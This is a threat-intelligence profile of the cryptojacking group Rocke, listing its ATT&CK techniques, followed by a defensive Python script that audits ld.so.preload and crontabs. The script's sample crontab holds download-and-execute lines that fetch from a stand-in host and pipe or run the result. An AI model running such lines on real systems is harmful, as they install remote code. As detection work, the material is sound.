
Rocke

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)
ID: G0106
Associated Groups: 
Version: 1.0
Created: 26 May 2020
Last Modified: 19 Jun 2020

Associated Group Descriptions

Name Description

Techniques Used

Domain ID Name Use

Enterprise T1071.001 Application Layer Protocol: Web Protocols

Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)

Enterprise T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)

Enterprise T1059.004 Command and Scripting Interpreter: Unix Shell

Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)

Enterprise T1059.006 Command and Scripting Interpreter: Python

Rocke has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)

Enterprise T1543.002 Create or Modify System Process: Systemd Service

Rocke has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)

Enterprise T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

Rocke has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)

Enterprise T1564.001 Hide Artifacts: Hidden Files and Directories

Rocke downloaded a file "libprocesshider", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)

Enterprise T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking

Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)

Enterprise T1562.001 Impair Defenses: Disable or Modify Tools

Rocke used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)

Enterprise T1562.004 Impair Defenses: Disable or Modify System Firewall

Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)

Enterprise T1070.002 Indicator Removal: Clear Linux or Mac System Logs

Rocke has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)

Enterprise T1070.004 Indicator Removal: File Deletion

Rocke has deleted files on infected machines.(Citation: Anomali Rocke March 2019)

Enterprise T1070.006 Indicator Removal: Timestomp

Rocke has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)

Enterprise T1036.005 Masquerading: Match Legitimate Name or Location

Rocke has used shell scripts which download mining executables and save them with the filename "java".(Citation: Talos Rocke August 2018)

Enterprise T1027.002 Obfuscated Files or Information: Software Packing

Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)

Enterprise T1027.004 Obfuscated Files or Information: Compile After Delivery

Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)

Enterprise T1055.002 Process Injection: Portable Executable Injection

Rocke's miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)

Enterprise T1021.004 Remote Services: SSH

Rocke has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)

Enterprise T1053.003 Scheduled Task/Job: Cron

Rocke installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)

Enterprise T1518.001 Software Discovery: Security Software Discovery

Rocke used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)

Enterprise T1552.004 Unsecured Credentials: Private Keys

Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)

Enterprise T1102.001 Web Service: Dead Drop Resolver

Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)
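Two of the entries above, the /etc/ld.so.preload modification (T1574.006) and the cron job that downloads and executes files (T1053.003), leave artifacts a responder can audit offline from captured files. The following is an added example of such an audit, not code from ATT&CK or the cited reports; the allowlist path and the sample inputs are hypothetical/constructed.

```python
"""Offline checks for two Rocke artifacts: unexpected /etc/ld.so.preload
entries and cron jobs that fetch remote content and run it.
Inputs are passed as text so the checks run against captured files."""
import re
from typing import List

# Hypothetical allowlist: libraries an operator deliberately preloads.
# On most hosts ld.so.preload is absent or empty, so any entry is notable.
ALLOWED_PRELOADS = {"/usr/lib/x86_64-linux-gnu/libmyauditshim.so"}

# A cron job that both fetches (wget/curl) and executes what it fetched
# (pipe to a shell, run a script, chmod +x, or run a freshly written path)
# is the download-and-execute pattern described in the cron entry.
_FETCH = re.compile(r"\b(wget|curl)\b")
_EXEC = re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+/?\S+|\bchmod\s+\+?x|&&\s*/\S+")


def audit_ld_preload(contents: str, allowed=ALLOWED_PRELOADS) -> List[str]:
    """Return preload paths not on the allowlist. Any such library is
    loaded into every dynamically linked program, so it can filter what
    ps, top and similar tools report (the libprocesshider effect)."""
    findings = []
    for line in contents.splitlines():
        path = line.split("#", 1)[0].strip()   # strip comments/whitespace
        if path and path not in allowed:
            findings.append(path)
    return findings


def audit_crontab(crontab: str) -> List[str]:
    """Return cron lines that both fetch remote content and execute it."""
    findings = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if _FETCH.search(line) and _EXEC.search(line):
            findings.append(line)
    return findings


# Constructed sample inputs (not real Rocke artifacts).
SAMPLE_PRELOAD = "/usr/local/lib/libprocesshider.so\n"
SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/certbot renew --quiet\n"
    "*/10 * * * * curl -fsSL http://example.invalid/update.sh | sh\n"
    "*/15 * * * * wget -q -O /tmp/java http://example.invalid/java && chmod +x /tmp/java && /tmp/java\n"
)

if __name__ == "__main__":
    print("ld.so.preload findings:", audit_ld_preload(SAMPLE_PRELOAD))
    print("cron findings:", audit_crontab(SAMPLE_CRONTAB))
```

The certbot line is left alone because it downloads nothing; the two flagged lines each pair a fetch with an execution step.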

Software

ID Name References Techniques

References